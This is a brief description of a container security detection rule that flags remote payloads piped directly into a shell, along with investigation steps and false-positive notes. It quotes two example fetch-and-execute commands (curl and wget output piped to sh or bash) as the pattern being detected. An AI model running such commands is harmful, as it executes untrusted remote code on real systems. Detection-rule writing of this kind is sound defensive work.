This detection rule identifies potential security incidents where a payload is downloaded and piped directly to a shell in a running Linux container. This kind of behavior is often associated with threat actors executing malicious payloads without leaving a trace on the filesystem, as the payload is executed immediately after download. Common patterns include commands such as `curl http://host/payload.sh | sh` or `wget -qO- http://host/bootstrap | bash`. The rule utilizes EQL (Event Query Language) to monitor for interactive sessions where a downloader process is immediately followed by shell execution. Investigative steps emphasize capturing the context of the command line execution, identifying any network interactions, and monitoring for other processes initiated by the shell that may indicate further malicious activity. False positives may occur if legitimate administrators use similar command patterns for legitimate troubleshooting. The rule is part of the Elastic Defend for Containers, operational as of version 9.3.0, and is classified under medium risk due to its potential implications.